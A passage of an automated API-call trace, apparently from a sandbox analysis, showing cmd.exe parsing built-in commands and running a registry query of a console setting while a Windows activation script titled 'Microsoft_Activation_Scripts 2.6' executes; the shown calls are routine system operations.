_String2="SETLOCAL") returned -1 [0176.031] _wcsicmp (_String1="reg", _String2="ENDLOCAL") returned 13 [0176.031] _wcsicmp (_String1="reg", _String2="TITLE") returned -2 [0176.031] _wcsicmp (_String1="reg", _String2="START") returned -1 [0176.031] _wcsicmp (_String1="reg", _String2="DPATH") returned 14 [0176.031] _wcsicmp (_String1="reg", _String2="KEYS") returned 7 [0176.031] _wcsicmp (_String1="reg", _String2="MOVE") returned 5 [0176.031] _wcsicmp (_String1="reg", _String2="PUSHD") returned 2 [0176.031] _wcsicmp (_String1="reg", _String2="POPD") returned 2 [0176.031] _wcsicmp (_String1="reg", _String2="ASSOC") returned 17 [0176.031] _wcsicmp (_String1="reg", _String2="FTYPE") returned 12 [0176.031] _wcsicmp (_String1="reg", _String2="BREAK") returned 16 [0176.031] _wcsicmp (_String1="reg", _String2="COLOR") returned 15 [0176.032] _wcsicmp (_String1="reg", _String2="MKLINK") returned 5 [0176.032] _wcsicmp (_String1="reg", _String2="DIR") returned 14 [0176.032] _wcsicmp (_String1="reg", _String2="ERASE") returned 13 [0176.032] _wcsicmp (_String1="reg", _String2="DEL") returned 14 [0176.032] _wcsicmp (_String1="reg", _String2="TYPE") returned -2 [0176.032] _wcsicmp (_String1="reg", _String2="COPY") returned 15 [0176.032] _wcsicmp (_String1="reg", _String2="CD") returned 15 [0176.032] _wcsicmp (_String1="reg", _String2="CHDIR") returned 15 [0176.032] _wcsicmp (_String1="reg", _String2="RENAME") returned -7 [0176.032] _wcsicmp (_String1="reg", _String2="REN") returned -7 [0176.032] _wcsicmp (_String1="reg", _String2="ECHO") returned 13 [0176.032] _wcsicmp (_String1="reg", _String2="SET") returned -1 [0176.032] _wcsicmp (_String1="reg", _String2="PAUSE") returned 2 [0176.032] _wcsicmp (_String1="reg", _String2="DATE") returned 14 [0176.032] _wcsicmp (_String1="reg", _String2="TIME") returned -2 [0176.032] _wcsicmp (_String1="reg", _String2="PROMPT") returned 2 [0176.032] _wcsicmp (_String1="reg", _String2="MD") returned 5 [0176.033] _wcsicmp (_String1="reg", _String2="MKDIR") returned 5 [0176.033] _wcsicmp (_String1="reg", _String2="RD") returned 1 [0176.033] _wcsicmp (_String1="reg", _String2="RMDIR") returned -8 [0176.033] _wcsicmp (_String1="reg", _String2="PATH") returned 2 [0176.033] _wcsicmp (_String1="reg", _String2="GOTO") returned 11 [0176.033] _wcsicmp (_String1="reg", _String2="SHIFT") returned -1 [0176.033] _wcsicmp (_String1="reg", _String2="CLS") returned 15 [0176.033] _wcsicmp (_String1="reg", _String2="CALL") returned 15 [0176.033] _wcsicmp (_String1="reg", _String2="VERIFY") returned -4 [0176.033] _wcsicmp (_String1="reg", _String2="VER") returned -4 [0176.033] _wcsicmp (_String1="reg", _String2="VOL") returned -4 [0176.033] _wcsicmp (_String1="reg", _String2="EXIT") returned 13 [0176.033] _wcsicmp (_String1="reg", _String2="SETLOCAL") returned -1 [0176.033] _wcsicmp (_String1="reg", _String2="ENDLOCAL") returned 13 [0176.033] _wcsicmp (_String1="reg", _String2="TITLE") returned -2 [0176.033] _wcsicmp (_String1="reg", _String2="START") returned -1 [0176.033] _wcsicmp (_String1="reg", _String2="DPATH") returned 14 [0176.033] _wcsicmp (_String1="reg", _String2="KEYS") returned 7 [0176.033] _wcsicmp (_String1="reg", _String2="MOVE") returned 5 [0176.033] _wcsicmp (_String1="reg", _String2="PUSHD") returned 2 [0176.033] _wcsicmp (_String1="reg", _String2="POPD") returned 2 [0176.033] _wcsicmp (_String1="reg", _String2="ASSOC") returned 17 [0176.033] _wcsicmp (_String1="reg", _String2="FTYPE") returned 12 [0176.033] _wcsicmp (_String1="reg", _String2="BREAK") returned 16 [0176.033] _wcsicmp (_String1="reg", _String2="COLOR") returned 15 [0176.033] _wcsicmp (_String1="reg", _String2="MKLINK") returned 5 [0176.033] _wcsicmp (_String1="reg", _String2="FOR") returned 12 [0176.033] _wcsicmp (_String1="reg", _String2="IF") returned 9 [0176.033] _wcsicmp (_String1="reg", _String2="REM") returned -6 [0176.033] GetProcessHeap () returned 0x19a8f1e0000 [0176.034] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f1fddc0 [0176.034] _wcsicmp (_String1="reg", _String2="DIR") returned 14 [0176.034] _wcsicmp (_String1="reg", _String2="ERASE") returned 13 [0176.034] _wcsicmp (_String1="reg", _String2="DEL") returned 14 [0176.034] _wcsicmp (_String1="reg", _String2="TYPE") returned -2 [0176.034] _wcsicmp (_String1="reg", _String2="COPY") returned 15 [0176.034] _wcsicmp (_String1="reg", _String2="CD") returned 15 [0176.034] _wcsicmp (_String1="reg", _String2="CHDIR") returned 15 [0176.034] _wcsicmp (_String1="reg", _String2="RENAME") returned -7 [0176.034] _wcsicmp (_String1="reg", _String2="REN") returned -7 [0176.034] _wcsicmp (_String1="reg", _String2="ECHO") returned 13 [0176.034] _wcsicmp (_String1="reg", _String2="SET") returned -1 [0176.034] _wcsicmp (_String1="reg", _String2="PAUSE") returned 2 [0176.034] _wcsicmp (_String1="reg", _String2="DATE") returned 14 [0176.034] _wcsicmp (_String1="reg", _String2="TIME") returned -2 [0176.034] _wcsicmp (_String1="reg", _String2="PROMPT") returned 2 [0176.034] _wcsicmp (_String1="reg", _String2="MD") returned 5 [0176.034] _wcsicmp (_String1="reg", _String2="MKDIR") returned 5 [0176.034] _wcsicmp (_String1="reg", _String2="RD") returned 1 [0176.034] _wcsicmp (_String1="reg", _String2="RMDIR") returned -8 [0176.034] _wcsicmp (_String1="reg", _String2="PATH") returned 2 [0176.034] _wcsicmp (_String1="reg", _String2="GOTO") returned 11 [0176.034] _wcsicmp (_String1="reg", _String2="SHIFT") returned -1 [0176.034] _wcsicmp (_String1="reg", _String2="CLS") returned 15 [0176.034] _wcsicmp (_String1="reg", _String2="CALL") returned 15 [0176.034] _wcsicmp (_String1="reg", _String2="VERIFY") returned -4 [0176.034] _wcsicmp (_String1="reg", _String2="VER") returned -4 [0176.034] _wcsicmp (_String1="reg", _String2="VOL") returned -4 [0176.034] _wcsicmp (_String1="reg", _String2="EXIT") returned 13 [0176.034] _wcsicmp (_String1="reg", _String2="SETLOCAL") returned -1 [0176.034] _wcsicmp (_String1="reg", _String2="ENDLOCAL") returned 13 [0176.035] _wcsicmp (_String1="reg", _String2="TITLE") returned -2 [0176.035] _wcsicmp (_String1="reg", _String2="START") returned -1 [0176.035] _wcsicmp (_String1="reg", _String2="DPATH") returned 14 [0176.035] _wcsicmp (_String1="reg", _String2="KEYS") returned 7 [0176.035] _wcsicmp (_String1="reg", _String2="MOVE") returned 5 [0176.035] _wcsicmp (_String1="reg", _String2="PUSHD") returned 2 [0176.035] _wcsicmp (_String1="reg", _String2="POPD") returned 2 [0176.035] _wcsicmp (_String1="reg", _String2="ASSOC") returned 17 [0176.035] _wcsicmp (_String1="reg", _String2="FTYPE") returned 12 [0176.035] _wcsicmp (_String1="reg", _String2="BREAK") returned 16 [0176.035] _wcsicmp (_String1="reg", _String2="COLOR") returned 15 [0176.035] _wcsicmp (_String1="reg", _String2="MKLINK") returned 5 [0176.035] _wcsnicmp (_String1="reg", _String2="cmd ", _MaxCount=0x4) returned 15 [0176.035] GetProcessHeap () returned 0x19a8f1e0000 [0176.035] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x420) returned 0x19a8f1ea4b0 [0176.035] SetErrorMode (uMode=0x0) returned 0x0 [0176.035] SetErrorMode (uMode=0x1) returned 0x0 [0176.035] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x19a8f1ea4c0, lpFilePart=0x43f9efe980 | out: lpBuffer="C:\\Windows\\System32", lpFilePart=0x43f9efe980*="System32") returned 0x13 [0176.035] SetErrorMode (uMode=0x0) returned 0x1 [0176.035] GetProcessHeap () returned 0x19a8f1e0000 [0176.035] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ea4b0, Size=0x40) returned 0x19a8f1ea4b0 [0176.035] GetProcessHeap () returned 0x19a8f1e0000 [0176.035] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ea4b0) returned 0x40 [0176.035] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x58 [0176.035] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0176.036] GetProcessHeap () returned 0x19a8f1e0000 [0176.036] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xee) returned 0x19a8f1fa2f0 [0176.036] GetProcessHeap () returned 0x19a8f1e0000 [0176.036] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1cc) returned 0x19a8f1eabb0 [0176.036] GetProcessHeap () returned 0x19a8f1e0000 [0176.036] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eabb0, Size=0xf0) returned 0x19a8f1eabb0 [0176.036] GetProcessHeap () returned 0x19a8f1e0000 [0176.036] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eabb0) returned 0xf0 [0176.036] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x3a [0176.036] GetProcessHeap () returned 0x19a8f1e0000 [0176.036] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xfc) returned 0x19a8f1eacb0 [0176.036] GetProcessHeap () returned 0x19a8f1e0000 [0176.036] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1eacb0, Size=0x88) returned 0x19a8f1eacb0 [0176.036] GetProcessHeap () returned 0x19a8f1e0000 [0176.036] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1eacb0) returned 0x88 [0176.036] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0176.036] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\reg.*" (normalized: "c:\\windows\\system32\\reg.*"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe700, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe700) returned 0x19a8f1f8700 [0176.036] FindClose (in: hFindFile=0x19a8f1f8700 | out: hFindFile=0x19a8f1f8700) returned 1 [0176.036] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\reg.COM" (normalized: "c:\\windows\\system32\\reg.com"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe700, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe700) returned 0xffffffffffffffff [0176.037] GetLastError () returned 0x2 [0176.037] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\reg.EXE" (normalized: "c:\\windows\\system32\\reg.exe"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe700, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe700) returned 0x19a8f1f8ac0 [0176.037] FindClose (in: hFindFile=0x19a8f1f8ac0 | out: hFindFile=0x19a8f1f8ac0) returned 1 [0176.037] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0176.037] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0176.037] GetProcessHeap () returned 0x19a8f1e0000 [0176.037] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x28) returned 0x19a8f1eb9e0 [0176.037] _get_osfhandle (_FileHandle=2) returned 0x28 [0176.037] _get_osfhandle (_FileHandle=2) returned 0x28 [0176.037] _get_osfhandle (_FileHandle=2) returned 0x28 [0176.037] GetFileType (hFile=0x28) returned 0x2 [0176.037] GetStdHandle (nStdHandle=0xfffffff4) returned 0x28 [0176.037] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x43f9efe9b8 | out: lpMode=0x43f9efe9b8) returned 1 [0176.040] _dup (_FileHandle=2) returned 4 [0176.040] _close (_FileHandle=2) returned 0 [0176.040] _wcsicmp (_String1="nul", _String2="con") returned 11 [0176.040] CreateFileW (lpFileName="nul" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x43f9efe950, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28 [0176.040] _open_osfhandle (_OSFileHandle=0x28, _Flags=8) returned 2 [0176.040] GetProcessHeap () returned 0x19a8f1e0000 [0176.040] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x218) returned 0x19a8f1f9f80 [0176.040] GetProcessHeap () returned 0x19a8f1e0000 [0176.040] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x5e) returned 0x19a8f1ead50 [0176.040] _wcsnicmp (_String1="reg", _String2="cmd ", _MaxCount=0x4) returned 15 [0176.040] GetProcessHeap () returned 0x19a8f1e0000 [0176.040] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x420) returned 0x19a8f1ea500 [0176.040] SetErrorMode (uMode=0x0) returned 0x0 [0176.041] SetErrorMode (uMode=0x1) returned 0x0 [0176.041] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x19a8f1ea510, lpFilePart=0x43f9efe710 | out: lpBuffer="C:\\Windows\\System32", lpFilePart=0x43f9efe710*="System32") returned 0x13 [0176.041] SetErrorMode (uMode=0x0) returned 0x1 [0176.041] GetProcessHeap () returned 0x19a8f1e0000 [0176.041] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ea500, Size=0x40) returned 0x19a8f1ea500 [0176.041] GetProcessHeap () returned 0x19a8f1e0000 [0176.041] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1ea500) returned 0x40 [0176.041] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x58 [0176.041] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0176.041] GetProcessHeap () returned 0x19a8f1e0000 [0176.041] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xee) returned 0x19a8f1fb6f0 [0176.041] GetProcessHeap () returned 0x19a8f1e0000 [0176.041] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1cc) returned 0x19a8f1e5e10 [0176.041] GetProcessHeap () returned 0x19a8f1e0000 [0176.041] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1e5e10, Size=0xf0) returned 0x19a8f1e5e10 [0176.041] GetProcessHeap () returned 0x19a8f1e0000 [0176.041] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1e5e10) returned 0xf0 [0176.041] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x3a [0176.041] GetProcessHeap () returned 0x19a8f1e0000 [0176.041] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xfc) returned 0x19a8f1e5f10 [0176.041] GetProcessHeap () returned 0x19a8f1e0000 [0176.041] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1e5f10, Size=0x88) returned 0x19a8f1e5f10 [0176.041] GetProcessHeap () returned 0x19a8f1e0000 [0176.041] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1e5f10) returned 0x88 [0176.041] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0176.041] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\reg.*" (normalized: "c:\\windows\\system32\\reg.*"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe490, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe490) returned 0x19a8f1f8a00 [0176.042] FindClose (in: hFindFile=0x19a8f1f8a00 | out: hFindFile=0x19a8f1f8a00) returned 1 [0176.042] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\reg.COM" (normalized: "c:\\windows\\system32\\reg.com"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe490, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe490) returned 0xffffffffffffffff [0176.042] GetLastError () returned 0x2 [0176.042] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\reg.EXE" (normalized: "c:\\windows\\system32\\reg.exe"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe490, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe490) returned 0x19a8f1f8940 [0176.042] FindClose (in: hFindFile=0x19a8f1f8940 | out: hFindFile=0x19a8f1f8940) returned 1 [0176.042] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0176.042] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0176.042] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efe9f0, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0176.043] InitializeProcThreadAttributeList (in: lpAttributeList=0x43f9efe910, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x43f9efe810 | out: lpAttributeList=0x43f9efe910, lpSize=0x43f9efe810) returned 1 [0176.043] UpdateProcThreadAttribute (in: lpAttributeList=0x43f9efe910, dwFlags=0x0, Attribute=0x60001, lpValue=0x43f9efe7fc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x43f9efe910, lpPreviousValue=0x0) returned 1 [0176.043] GetStartupInfoW (in: lpStartupInfo=0x43f9efe8a0 | out: lpStartupInfo=0x43f9efe8a0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0176.043] GetProcessHeap () returned 0x19a8f1e0000 [0176.043] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1eb920 [0176.043] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0176.043] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0176.043] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0176.043] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0176.043] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0176.043] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0176.043] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0176.043] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0176.043] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0176.043] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0176.044] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0176.044] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0176.044] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0176.044] _wcsnicmp (_String1="COPYCMD", _String2="mas=htt", _MaxCount=0x7) returned -10 [0176.044] _wcsnicmp (_String1="COPYCMD", _String2="masver=", _MaxCount=0x7) returned -10 [0176.044] _wcsnicmp (_String1="COPYCMD", _String2="nul=>nu", _MaxCount=0x7) returned -11 [0176.044] _wcsnicmp (_String1="COPYCMD", _String2="nul1=1>", _MaxCount=0x7) returned -11 [0176.044] _wcsnicmp (_String1="COPYCMD", _String2="nul2=2>", _MaxCount=0x7) returned -11 [0176.044] _wcsnicmp (_String1="COPYCMD", _String2="nul6=2^", _MaxCount=0x7) returned -11 [0176.044] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0176.044] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0176.044] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0176.044] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0176.044] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0176.044] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0176.044] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0176.044] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0176.044] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0176.044] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0176.044] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0176.044] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0176.044] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0176.044] _wcsnicmp (_String1="COPYCMD", _String2="psc=pow", _MaxCount=0x7) returned -13 [0176.044] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0176.044] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0176.044] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0176.044] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0176.044] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0176.044] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0176.044] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0176.044] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0176.045] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0176.045] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0176.045] _wcsnicmp (_String1="COPYCMD", _String2="winbuil", _MaxCount=0x7) returned -20 [0176.045] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0176.045] _wcsnicmp (_String1="COPYCMD", _String2="_cmdf=C", _MaxCount=0x7) returned 4 [0176.045] _wcsnicmp (_String1="COPYCMD", _String2="_NCS=1", _MaxCount=0x7) returned 4 [0176.045] GetProcessHeap () returned 0x19a8f1e0000 [0176.045] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb920) returned 1 [0176.045] GetProcessHeap () returned 0x19a8f1e0000 [0176.045] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x12) returned 0x19a8f1ecdc0 [0176.045] lstrcmpW (lpString1="\\reg.exe", lpString2="\\XCOPY.EXE") returned -1 [0176.046] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\reg.exe", lpCommandLine="reg query \"HKCU\\Console\" /v ForceV2 ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\System32", lpStartupInfo=0x43f9efe830*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="reg query \"HKCU\\Console\" /v ForceV2 ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x43f9efe818 | out: lpCommandLine="reg query \"HKCU\\Console\" /v ForceV2 ", lpProcessInformation=0x43f9efe818*(hProcess=0xac, hThread=0x9c, dwProcessId=0xce0, dwThreadId=0xce4)) returned 1 [0176.059] CloseHandle (hObject=0x9c) returned 1 [0176.059] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0176.059] GetProcessHeap () returned 0x19a8f1e0000 [0176.059] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eeb50) returned 1 [0176.059] GetEnvironmentStringsW () returned 0x19a8f1ece20* [0176.060] GetProcessHeap () returned 0x19a8f1e0000 [0176.060] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xbee) returned 0x19a8f1eeb50 [0176.060] memcpy (in: _Dst=0x19a8f1eeb50, _Src=0x19a8f1ece20, _Size=0xbee | out: _Dst=0x19a8f1eeb50) returned 0x19a8f1eeb50 [0176.060] FreeEnvironmentStringsA (penv="=") returned 1 [0176.060] GetProcessHeap () returned 0x19a8f1e0000 [0176.060] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecdc0) returned 1 [0176.060] DeleteProcThreadAttributeList (in: lpAttributeList=0x43f9efe910 | out: lpAttributeList=0x43f9efe910) [0176.060] _dup2 (_FileHandleSrc=4, _FileHandleDst=2) returned 0 [0176.060] _close (_FileHandle=4) returned 0 [0176.060] _get_osfhandle (_FileHandle=3) returned 0x84 [0176.060] DuplicateHandle (in: hSourceProcessHandle=0xac, hSourceHandle=0x84, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1 [0176.060] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0 [0176.060] _close (_FileHandle=5) returned 0 [0176.060] _dup (_FileHandle=0) returned 4 [0176.060] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0 [0176.060] _close (_FileHandle=3) returned 0 [0176.061] _wcsicmp (_String1="find", _String2="DIR") returned 2 [0176.061] _wcsicmp (_String1="find", _String2="ERASE") returned 1 [0176.061] _wcsicmp (_String1="find", _String2="DEL") returned 2 [0176.061] _wcsicmp (_String1="find", _String2="TYPE") returned -14 [0176.061] _wcsicmp (_String1="find", _String2="COPY") returned 3 [0176.061] _wcsicmp (_String1="find", _String2="CD") returned 3 [0176.061] _wcsicmp (_String1="find", _String2="CHDIR") returned 3 [0176.061] _wcsicmp (_String1="find", _String2="RENAME") returned -12 [0176.061] _wcsicmp (_String1="find", _String2="REN") returned -12 [0176.061] _wcsicmp (_String1="find", _String2="ECHO") returned 1 [0176.061] _wcsicmp (_String1="find", _String2="SET") returned -13 [0176.061] _wcsicmp (_String1="find", _String2="PAUSE") returned -10 [0176.061] _wcsicmp (_String1="find", _String2="DATE") returned 2 [0176.061] _wcsicmp (_String1="find", _String2="TIME") returned -14 [0176.061] _wcsicmp (_String1="find", _String2="PROMPT") returned -10 [0176.061] _wcsicmp (_String1="find", _String2="MD") returned -7 [0176.061] _wcsicmp (_String1="find", _String2="MKDIR") returned -7 [0176.061] _wcsicmp (_String1="find", _String2="RD") returned -12 [0176.061] _wcsicmp (_String1="find", _String2="RMDIR") returned -12 [0176.061] _wcsicmp (_String1="find", _String2="PATH") returned -10 [0176.061] _wcsicmp (_String1="find", _String2="GOTO") returned -1 [0176.061] _wcsicmp (_String1="find", _String2="SHIFT") returned -13 [0176.061] _wcsicmp (_String1="find", _String2="CLS") returned 3 [0176.061] _wcsicmp (_String1="find", _String2="CALL") returned 3 [0176.061] _wcsicmp (_String1="find", _String2="VERIFY") returned -16 [0176.061] _wcsicmp (_String1="find", _String2="VER") returned -16 [0176.061] _wcsicmp (_String1="find", _String2="VOL") returned -16 [0176.061] _wcsicmp (_String1="find", _String2="EXIT") returned 1 [0176.061] _wcsicmp (_String1="find", _String2="SETLOCAL") returned -13 [0176.061] _wcsicmp (_String1="find", _String2="ENDLOCAL") returned 1 [0176.061] _wcsicmp (_String1="find", _String2="TITLE") returned -14 [0176.062] _wcsicmp (_String1="find", _String2="START") returned -13 [0176.062] _wcsicmp (_String1="find", _String2="DPATH") returned 2 [0176.062] _wcsicmp (_String1="find", _String2="KEYS") returned -5 [0176.062] _wcsicmp (_String1="find", _String2="MOVE") returned -7 [0176.062] _wcsicmp (_String1="find", _String2="PUSHD") returned -10 [0176.062] _wcsicmp (_String1="find", _String2="POPD") returned -10 [0176.062] _wcsicmp (_String1="find", _String2="ASSOC") returned 5 [0176.062] _wcsicmp (_String1="find", _String2="FTYPE") returned -11 [0176.062] _wcsicmp (_String1="find", _String2="BREAK") returned 4 [0176.062] _wcsicmp (_String1="find", 